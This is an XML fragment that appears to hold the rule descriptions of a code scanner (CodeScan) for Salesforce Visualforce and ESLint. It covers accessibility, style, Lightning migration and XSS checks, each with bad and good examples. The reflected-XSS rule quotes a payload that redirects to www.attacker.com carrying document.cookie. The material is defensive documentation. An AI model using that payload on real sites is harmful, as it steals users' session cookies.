  <si>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mistake.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function fn() {\n    x = 1;\n    return x;\n    x = 3; // this will never execute\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows unreachable code after &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, &lt;code&gt;continue&lt;/code&gt;, and &lt;code&gt;break&lt;/code&gt; statements.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unreachable: "error"*/\n\nfunction foo() {\n    return true;\n    console.log("done");\n}\n\nfunction bar() {\n    throw new Error("Oops!");\n    console.log("done");\n}\n\nwhile(value) {\n    break;\n    console.log("done");\n}\n\nthrow new Error("Oops!");\nconsole.log("done");\n\nfunction baz() {\n    if (Math.random() &lt; 0.5) {\n        return;\n    } else {\n        throw new Error();\n    }\n    console.log("done");\n}\n\nfor (;;) {}\nconsole.log("done");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule, because of JavaScript function and variable hoisting:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unreachable: "error"*/\n\nfunction foo() {\n    return bar();\n    function bar() {\n        return 1;\n    }\n}\n\nfunction bar() {\n    return x;\n    var x;\n}\n\nswitch (foo) {\n    case 1:\n        break;\n        var x;\n}\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:exception</t>
  </si>
  <si>
    <t>Tracks CodeScan Eslint Exceptions</t>
  </si>
  <si>
    <t>&lt;p&gt;Violations of this rule may occur due to parsing errors and other exceptions thrown by the Javascript rule set.  Do not turn this off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>vf:AvoidLinkingToRecordIds</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for Hard Coded ID Links</t>
  </si>
  <si>
    <t>HREF may link directly to Salesforce record.  An anchor tag refers directly to a record ID on this page.\nDirect links to records aren't supported in Lightning Experience.\nTo view, create, or edit records, use actions and functions rather than direct URLs. For example, use\n{!URLFOR($Action.Contact.Edit, recordId)}\nto edit a contact record in Visualforce markup, or navigateToSObject(recordId) in JavaScript.\n\nSee &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n\n&lt;a href="/030000000123"&amp;gtl;Click here&lt;/a&gt;\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningIframeCheck</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for apex:iframe</t>
  </si>
  <si>
    <t>This rule looks for apex:iframe usage which may no longer work in lightning.\nAlthough apex:iframe is supported in Lightning Experience, we recommend avoiding it.\nOnly use this component if you're comfortable working with iframes in JavaScript and understand how they affect the DOM. If you haven't worked with nested iframes before, you might run into problems that are difficult to debug.\n\n\nSee &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n\n&lt;apex:page&gt;\n	&lt;apex:iframe&gt;&lt;/apex:iframe&gt; //Bad: not recommended.\n&lt;/apex:page&gt;\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:MetaRefreshCheck</t>
  </si>
  <si>
    <t>Meta Tags Should Not Be Used to Refresh or Redirect</t>
  </si>
  <si>
    <t>&lt;p&gt;\nUse of &lt;code&gt;&lt;meta http-equiv="refresh"&gt;&lt;/code&gt; is discouraged by the World Wide Web Consortium (W3C).\nIf a user clicks the 'Back' button, some browers will go back to the redirecting page, which will prevent the user from actually going back.\n&lt;/p&gt;\n\n&lt;p&gt;\nTo refresh the page, a better alternative is to use Ajax, to refresh only what needs to be refreshed and not the whole page.\nTo redirect to another page, using the HTTP response status code 301 'Moved Permanently' and 302 'Found' is a better option.\n&lt;/p&gt;\n\n  \n  	\n&lt;p&gt;The code snippet illustrates this rule:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;head&gt;\n  &lt;meta http-equiv="refresh" content="5"&gt;   //Bad: this is not recommended.\n  &lt;meta name="description" content="..."&gt;\n&lt;/head&gt;\n&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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image.\nWithout those attributes, the page layout constantly changes as images are loaded until they are all loaded, which can disorient users.\n\n  \n\n&lt;p&gt;The following code:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;img src="logo.png" alt="My Company" /&gt;                           //Bad: this is not recommended.\n&lt;/pre&gt;\n\nshould be refactored into:\n\n&lt;pre&gt;\n&lt;img src="logo.png" alt="My Company" width="100" height="50" /&gt;   //Good: this is preferred.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHighActionPollerInterval</t>
  </si>
  <si>
    <t>Avoid High apex:actionpoller Interval</t>
  </si>
  <si>
    <t>Action methods used by &lt;apex:actionPoller&gt; should be lightweight. It’s a best practice to avoid performing DML, external service calls, and other resource-intensive operations in action methods called by an &lt;apex:actionPoller&gt;. Carefully consider the effect of your action method being called repeatedly by an &lt;apex:actionPoller&gt; at the interval you specify, especially if it’s used on a page that will be widely distributed, or open continuously.\n\nSee &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_best_practices_performance.htm"&gt;https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_best_practices_performance.htm&lt;/a&gt;\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;apex:page controller="ExampleController"&gt;\n    &lt;apex:form&gt;\n        &lt;apex:outputText value="Watch this counter: {!count}" id="counter"/&gt;\n        &lt;apex:actionPoller action="{!incrementCounter}" reRender="counter" interval="30"/&gt;  //Bad: An interval of 30 may be too high.\n    &lt;/apex:form&gt;\n&lt;/apex:page&gt;\n\n  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningPageCheck</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for apex:page attributes</t>
  </si>
  <si>
    <t>This rule looks for apex:page attributes usage which may no longer work in lightning.\n\nSee &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n\n&lt;apex:page showheader='false' sidebar='false' title='not supported'&gt; //Bad: not recommended.\n&lt;/apex:page&gt;\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:MouseEventWithoutKeyboardEquivalentCheck</t>
  </si>
  <si>
    <t>Mouse Events should have Equivalent Keyboard Events</t>
  </si>
  <si>
    <t>Offering the same experience with the mouse and the keyboard allow users to pick their preferred device.\nAdditionally, users of assistive technology will also be able to browse the site even if they cannot use the mouse.\n    \n\n&lt;p&gt;The following code:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;a onClick="doSomething();" ...&gt;                                //Bad: 'onKeyPress' is missing.\n&lt;a onMouseover="doSomething();" ...&gt;                            //Bad: 'onFocus' is missing.\n&lt;a onMouseout="doSomething();" ...&gt;                             //Bad: 'onBlur' is missing.\n&lt;/pre&gt;\n\n&lt;p&gt;should be refactored into:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;a onClick="doSomething();" onKeyPress="doSomething();" ...&gt;    //Good: preferred approach.\n&lt;a onMouseover="doSomething();" onFocus="doSomething();" ...&gt;   //Good: preferred approach.\n&lt;a onMouseout="doSomething();" onBlur="doSomething();" ...&gt;     //Good: preferred approach.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:HeaderCheck</t>
  </si>
  <si>
    <t>Files Should Have a Header Comment</t>
  </si>
  <si>
    <t>This rule verifies files have a comment matching a given regular expression before the very first tag.\nThe header comment can be located before or after the &lt;code&gt;&lt;!DOCTYPE&gt;&lt;/code&gt; declaration.\n    \n\n&lt;p&gt;For example, with the format &lt;code&gt;.*Copyright.*&lt;/code&gt;, the following code:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;html&gt;                                    //Bad: not recommended.\n...\n&lt;/html&gt;\n&lt;/pre&gt;\n\n&lt;p&gt;should be refactored into:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;!-- Copyright 2013 SonarSource SA --&gt;    //Good: preferred approach.\n&lt;html&gt;\n...\n&lt;/html&gt;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHardCodedPageLink</t>
  </si>
  <si>
    <t>Avoid Hard-Coded Page Links.</t>
  </si>
  <si>
    <t>Avoid hard-coded Page links, use correct page references.\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n&lt;apex:page&gt;\n	\n	&lt;apex:outputLink value="/apex/otherpage.html"&gt;   //Bad: Hard-coded page link.\n  		This is a link to another page.\n  	&lt;/apex:outputLink&gt;\n  	\n  	&lt;apex:outputLink value="{!$Page.otherPage}"&gt;  //Good: This is recommended.\n  		This is a link to another page.\n  	&lt;/apex:outputLink&gt;\n\n&lt;/apex:page&gt;\n  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:InputImgWithoutAltCheck</t>
  </si>
  <si>
    <t>Image Buttons Should Have an "alt" Attribute</t>
  </si>
  <si>
    <t>&lt;p&gt;\nThe &lt;code&gt;alt&lt;/code&gt; attribute provides a textual alternative to an image.\nIt is used whenever the actual image cannot be rendered.\nCommon reasons for that include:\n&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;The image can no longer be found&lt;/li&gt;\n  &lt;li&gt;Slow internet connections, while waiting for the image to download&lt;/li&gt;\n  &lt;li&gt;Visually impaired users using a screen reader software&lt;/li&gt;\n  &lt;li&gt;Images loading is disabled, e.g. to reduce data consumption on mobile phones&lt;/li&gt;\n&lt;/ul&gt;\n\n&lt;p&gt;The following code illustrates this rule:&lt;/p&gt;\n\n&lt;pre&gt;\n\n  \n&lt;pre&gt;\n&lt;input type="image" src="foo.png" /&gt;                            //Bad: this is not recommended.\n&lt;input type="image" src="foo.png" alt="..." /&gt;                  //Good: this is preferred.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:MaxLineLengthCheck</t>
  </si>
  <si>
    <t>Avoid Long Lines</t>
  </si>
  <si>
    <t>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n		\n &lt;apex:page&gt;\n  &lt;html&gt;\n    &lt;div class='foo'&gt;       //Bad: The line below is much too long. Consider breaking it up over multiple lines. \n      &lt;p&gt;This may be a description on a page, html text or an element with a lot of attributes but having to scroll to the right a long way to find out what is going on is the worst&lt;/p&gt; \n    &lt;/div&gt;\n  &lt;/html&gt;\n&lt;/apex:page&gt;\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:ImgWithoutAltCheck</t>
  </si>
  <si>
    <t>Images Tags Should Have an "alt" Attribute</t>
  </si>
  <si>
    <t>&lt;p&gt;\nThe &lt;code&gt;alt&lt;/code&gt; attribute provides a textual alternative to an image.\nIt is used whenever the actual image cannot be rendered.\nCommon reasons for that include:\n&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;The image can no longer be found&lt;/li&gt;\n  &lt;li&gt;Slow internet connections, while waiting for the image to download&lt;/li&gt;\n  &lt;li&gt;Visually impaired users using a screen reader software&lt;/li&gt;\n  &lt;li&gt;Images loading is disabled, e.g. to reduce data consumption on mobile phones&lt;/li&gt;\n&lt;/ul&gt;\n\n&lt;p&gt;The following code illustrates this rule:&lt;/p&gt;\n\n\n\n  \n&lt;pre&gt;\n&lt;img src="foo.png" /&gt;                                           //Bad: this is not recommended.\n&lt;img src="foo.png" alt="Some textual description of foo.png" /&gt; //Good: this is preferred.</t>
  </si>
  <si>
    <t>vf:NonConsecutiveHeadingCheck</t>
  </si>
  <si>
    <t>Avoid Non Consecutive Heading Tags</t>
  </si>
  <si>
    <t>&lt;p&gt;\nHeading tags are used by search engines and screen reader softwares to construct an outline of the page.\nStarting at &lt;code&gt;&lt;h1&gt;&lt;/code&gt; and not skipping any level eases this automatic construction.\n&lt;/p&gt;\n\n    \n\n&lt;p&gt;The following code:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;h2&gt;My Title&lt;/h2&gt;     //Bad: h1 is not being used before h2.\n\n&lt;h3&gt;My Sub Title&lt;/h3&gt; //Good: h3 is being used after h2.\n&lt;/pre&gt;\n\n&lt;p&gt;should be refactored into:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;h1&gt;My Title&lt;/h1&gt;     //Good.\n\n&lt;h2&gt;My Sub Title&lt;/h2&gt; //Good.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:InlineStyleCheck</t>
  </si>
  <si>
    <t>Avoid Inline CSS Styles</t>
  </si>
  <si>
    <t>The goal of this rule is to ban the usage of HTML "style" property to make sure that all CSS styles are defined in CSS classes.\n\n&lt;style&gt; tags can also be a weak point for HTML injection.\n\n"For &lt;style&gt; tags the CDATA (HTML 4) or raw text (HTML 5) context applies. In this mode, the parser \nsearches for the closing script or style tag, and dispatches the contents of the string between these tags to the javascript or \nCSS parser. No HTML decoding occurs. This is because the HTML parser does not understand javascript or CSS; its parsing role is \nlimited to determining the length of the string to pass to the JS or CSS parser."\n\nMore information at: &lt;a href="https://developer.salesforce.com/page/Secure_Coding_Cross_Site_Scripting"&gt;https://developer.salesforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;/a&gt;\n\n     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n      \n &lt;style&gt; //Bad: using the inline style property is not recommended.\n \n 	//content...\n 	\n &lt;/style&gt;\n \n \n     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHtmlCommentCheck</t>
  </si>
  <si>
    <t>Avoid HTML Comments</t>
  </si>
  <si>
    <t>Checks for occurrence of HTML comments on server side pages.\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;!-- \nThis is a header comment and can be ignored.\n--&gt;\n\n&lt;apex:page&gt;\n	//Page content.\n\n	&lt;!-- Comment --&gt;  	//Bad: Consider removing this comment.\n	\n&lt;/apex:page&gt;\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:InlineStyleAttributesCheck</t>
  </si>
  <si>
    <t>Avoid Inline CSS Style Attributes</t>
  </si>
  <si>
    <t>&lt;p&gt;\nThis rule detects the usage of HTML "style" attributes to make sure that all CSS styles are defined in CSS classes.\n&lt;/p&gt;\n\n     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n      \n &lt;p style="color: blue;" &gt; //Bad: using inline style attributes is not recommended.\n \n 	//content...\n 	\n &lt;/p&gt;\n \n \n     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnencodedScript</t>
  </si>
  <si>
    <t>Unencoded Formulas in Script Tags XSS</t>
  </si>
  <si>
    <t>Makes sure that all values obtained from URL parameters are properly escaped / sanitized to avoid XSS attacks.&lt;br/&gt;\nInput can be sanitized JSENCODE().&lt;br/&gt;\n&lt;br/&gt;\nUsing unescaped parameters can be a security risk. See &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_scontrols.htm"&gt;here&lt;/a&gt; for more details.&lt;br/&gt;\n      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;script&gt;\n	var value = {!$CurrentPage.parameters.username}'; //Bad: not recommended.\n	var value = {!JSONENCODE($CurrentPage.parameters.username)}'; //Good: this is preferred.\n&lt;/script&gt;\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LongJavaScriptCheck</t>
  </si>
  <si>
    <t>Avoid Large Javascript Scriptlets</t>
  </si>
  <si>
    <t>Javascript scriptlets should not have too many lines of code. Such long Javascript pieces of code should be located in dedicated *.js source files.\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n   &lt;script type="text/javascript"&gt;\n      Sfdc.onReady(function() {\n      var id = '{!$Component.myForm.myPageBlock.myField}';  //Bad: too many lines of javascript is not recommended.\n      var inputField = document.getElementById(id);\n      console.log(inputField.value);\n      //...\n      //...\n      //...\n    });\n  &lt;/script&gt;\n      \n      	\n      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:DoubleQuotesCheck</t>
  </si>
  <si>
    <t>Use Double Quotes to Define Attributes</t>
  </si>
  <si>
    <t>Double quotes should be used to define attributes in VisualForce.  \n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n\n&lt;apex:page&gt;\n  &lt;html&gt;\n    &lt;div class='foo'&gt;   //Bad: not recommended.\n    \n      &lt;div class="bar"&gt;  //Good: double quotes are preferred.\n      &lt;/div&gt;\n      \n      \n    &lt;/div&gt;\n  &lt;/html&gt;\n&lt;/apex:page&gt;\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:ItalicTagsCheck</t>
  </si>
  <si>
    <t>"em" Tags Should Be Used Instead of "i"</t>
  </si>
  <si>
    <t>&lt;p&gt;\nThe &lt;strong&gt;/&lt;b&gt; and &lt;em&gt;/&lt;i&gt; tags have exactly the same effect in most web browsers, but there is a fundamental difference between them: &lt;strong&gt; and &lt;em&gt; have a semantic meaning whereas &lt;b&gt; and &lt;i&gt; only convey styling information like CSS.\n&lt;/p&gt;\n\n&lt;p&gt;\nWhen &lt;b&gt; can have simply no effect on a Palm device with limited display or when a screen reader software is used by a blind person, &lt;strong&gt; will:\n&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;Underline the characters on a Palm Pilot&lt;/li&gt;\n  &lt;li&gt;Speak with lower tone when using a screen reader such as Jaws&lt;/li&gt;\n  &lt;li&gt;And display the text bold in normal browsers&lt;/li&gt;\n&lt;/ul&gt;\n\n&lt;p&gt;Consequently:&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;in order to convey semantics, the &lt;b&gt; and &lt;i&gt; tags shall never be used,&lt;/li&gt;\n  &lt;li&gt;in order to convey styling information, the &lt;b&gt; and &lt;i&gt; should be avoided and CSS should be used instead.&lt;/li&gt;\n&lt;/ul&gt;\n\n\n\n     \n \n\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n\n&lt;pre&gt;\n&lt;i&gt;car&lt;/i&gt;                 //Bad: this is not recommended.\n&lt;b&gt;train&lt;/b&gt;               //Bad: this is not recommended.\n&lt;/pre&gt;\n\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n\n&lt;pre&gt;\n&lt;em&gt;car&lt;/em&gt;               //Good: this is preferred.\n&lt;strong&gt;train&lt;/strong&gt;     //Good: this is preferred.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnsupportedTagsInHtml5Check</t>
  </si>
  <si>
    <t>Tags No Longer Supported in HTML5 Should Not Be Used</t>
  </si>
  <si>
    <t>&lt;p&gt;\nThe following tags are no longer supported in HTML5 and should not be used:\n&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;&amp;lt;acronym&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;applet&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;basefont&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;big&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;center&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;dir&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;font&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;frame&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;frameset&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;isindex&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;noframes&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;strike&amp;gt;&lt;/li&gt;\n  &lt;li&gt;&amp;lt;tt&amp;gt;&lt;/li&gt;\n&lt;/ul&gt;\n\nMore information on deprecated tags is avaliable here - &lt;a href="https://www.tutorialspoint.com/html5/html5_deprecated_tags.htm"&gt;https://www.tutorialspoint.com/html5/html5_deprecated_tags.htm&lt;/a&gt;\n\n\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n      \n &lt;apex:page&gt;\n  &lt;html&gt;\n    \n    &lt;p&amp;gt&lt;big&gt;This is big text&lt;/big&gt;&lt;/p&amp;gt   //Bad: This is deprecated.\n    \n    &lt;p id="bigger"&gt;This is big text&lt;/p&gt;           //Good: The size of the text should now be specified in CSS.\n    \n    \n  &lt;/html&gt;\n&lt;/apex:page&gt;\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidDotNamespace</t>
  </si>
  <si>
    <t>Avoid Using Dot Namespace</t>
  </si>
  <si>
    <t>Avoid using apex. Component notation for namespaces.\n   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n	&lt;aura:application&gt;\n	  &lt;c.Lash_DemoLighting&gt;&lt;/c.Lash_DemoLighting&gt;   //Bad: This syntax is not recommended.\n   	\n	  &lt;c:Lash_DemoLighting/&gt;	//Good: This syntax is preferred.\n	\n	&lt;aura:application&gt;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidMultipleForms</t>
  </si>
  <si>
    <t>Avoid Multiple Forms</t>
  </si>
  <si>
    <t>Multiple forms increase a page's view state and is not recommended\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n	\n\n&lt;apex:page&gt;\n  &lt;apex:form&gt;\n  &lt;/apex:form&gt;\n  &lt;apex:form&gt; 	//Bad: page should only have a single apex:form\n  &lt;/apex:form&gt;\n&lt;/apex:page&gt;\n\n\n\n\n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</si>
  <si>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</si>
  <si>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</si>
  <si>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image.\nWithout those attributes, the page layout constantly changes as images are loaded until they are all loaded, which can disorient users.\n\n\n&lt;p&gt;The following code:&lt;/p&gt;\n\n&lt;pre&gt;\n&lt;img src="logo.png" alt="My Company" /&gt;                           //Bad: this is not recommended.\n&lt;/pre&gt;\n\nshould be refactored into:\n\n&lt;pre&gt;\n&lt;img src="logo.png" alt="My Company" width="100" height="50" /&gt;   //Good: this is preferred.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:CrossSiteScriptingReflected</t>
  </si>
  <si>
    <t>JavaScript Reflected XSS</t>
  </si>
  <si>
    <t>Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response.\n    	\n    	See &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_xss.htm"&gt;https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_xss.htm &lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;script&gt;var foo = '{!$CurrentPage.parameters.userparam}';&lt;/script&gt;    //Bad: Javascript does not have built in protections.\n                                                                      \n// If userparam was given the value "1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo='2"\n// all of the cookies for the current page would be sent to www.attacker.com.\n                                                                      \n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHardCodedResourceReferences</t>
  </si>
  <si>
    <t>Avoid Hard Coded Resource References</t>
  </si>
  <si>
    <t>This rule identifies files that have been referenced with a hard-coded path.  Best practise is to upload the files as a Static Resource.  \n  This allows referencing with $Resource.&lt;resource_name&gt;.  \n  \n  More information on Static resources is available here: &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_resources.htm"&gt;https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_resources.htm&lt;/a&gt;\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n	&lt;apex:page&gt;\n		\n		&lt;apex:image url="/resource/TestImage.png" /&gt;   	//Bad: Path is hard-coded.\n	\n		&lt;apex:image url="{!$Resource.TestImage}" /&gt;		//Good: Static Resource referencing is used.\n		\n	&lt;/apex:page&gt;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnescapedAttributes</t>
  </si>
  <si>
    <t>Unescaped Attribute Value XSS</t>
  </si>
  <si>
    <t>Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response.&lt;br/&gt;\n&lt;br/&gt;\nUsing unescaped parameters can be a security risk. See &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_scontrols.htm"&gt;here&lt;/a&gt; for more details.&lt;br/&gt;\n&lt;br/&gt;\nc:* and apex:* attributes are not checked unless they are known to cause problems. You can check other attributes by adding them to the configuration for this rule.\n      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;apex:includeScript value="{!$CurrentPage.parameters.userInput}" /&gt; //Bad: not recommended.\n&lt;apex:outputText value="{! data }" escape="false" /&gt; //Bad: not recommended.\n\n&lt;div onclick = "console.log('{!$CurrentPage.parameters.userInput}')"&gt;Click me!&lt;/div&gt; //Bad: not recommended.\n&lt;div onclick = "console.log('{!JSENCODE($CurrentPage.parameters.userInput)}')"&gt;Click me!&lt;/div&gt; //Good: this is better.\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:BoldTagsCheck</t>
  </si>
  <si>
    <t>"strong" Tags Should Be Used Instead of "b"</t>
  </si>
  <si>
    <t>&lt;p&gt;\nThe &lt;strong&gt;/&lt;b&gt; tags have exactly the same effect in most web browsers, but there is a fundamental difference between them: &lt;strong&gt; has a semantic meaning whereas &lt;b&gt; only conveys styling information like CSS.\n&lt;/p&gt;\n&lt;p&gt;\nWhen &lt;b&gt; can have simply no effect on a Palm device with limited display or when a screen reader software is used by a blind person, &lt;strong&gt; will:\n&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;Underline the characters on a Palm Pilot&lt;/li&gt;\n  &lt;li&gt;Speak with lower tone when using a screen reader such as Jaws&lt;/li&gt;\n  &lt;li&gt;And display the text bold in normal browsers&lt;/li&gt;\n&lt;/ul&gt;\n\n&lt;p&gt;Consequently:&lt;/p&gt;\n\n&lt;ul&gt;\n  &lt;li&gt;in order to convey semantics, the &lt;b&gt; tags shall never be used,&lt;/li&gt;\n  &lt;li&gt;in order to convey styling information, the &lt;b&gt; should be avoided and CSS should be used instead.&lt;/li&gt;\n&lt;/ul&gt;\n \n     \n \n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n\n&lt;pre&gt;\n&lt;i&gt;car&lt;/i&gt;                 //Bad: this is not recommended.\n&lt;b&gt;train&lt;/b&gt;               //Bad: this is not recommended.\n&lt;/pre&gt;\n\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n\n&lt;pre&gt;\n&lt;em&gt;car&lt;/em&gt;               //Good: this is preferred.\n&lt;strong&gt;train&lt;/strong&gt;     //Good: this is preferred.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningAvoidHardcodedSalesforceDomain</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for Salesforce.com and Force.com Links</t>
  </si>
  <si>
    <t>URL references might not work as expected if you decide to swap to My Domain or in Lightning Experience. \n\nIf you decide to use My Domain, you have to replace hard-coded references to your original URL with references to your new domain.\n\nUsing something lie {! $Site.Domain } may work better. \n\n\nSee &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;apex:page&gt;\n	&lt;a href="https://na1.salesforce.com/..."&gt;link&lt;/a&gt; // BAD\n	&lt;a href="https://{! $Site.Domain }/..."&gt;link&lt;/a&gt; // GOOD\n&lt;/apex:page&gt;\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:XPathRule</t>
  </si>
  <si>
    <t>CodeScan provides a very handy method for creating new rules by writing an XPath query. When the XPath query finds a match, a violation is created.\n    Let's take a simple example : assume we only want a single form on each Visualforce page. \n    We'd like to report a violation for every form after the first. Consider the following page:\n&lt;pre&gt;\n&lt;apex:page&gt;\n  &lt;apex:form&gt;\n  &lt;/apex:form&gt;\n  &lt;apex:form&gt; \n  &lt;/apex:form&gt;\n&lt;/apex:page&gt;\n&lt;/pre&gt;\n  The following expression does the magic we need:\n&lt;pre&gt;\n (//Element [@Name='apex:form'])[position()&gt; 1]\n&lt;/pre&gt;\n  See our &lt;a href="https://www.code-scan.com/tutorials/custom-rules/"&gt;Custom Rules tutorial&lt;/a&gt; for more information.</t>
  </si>
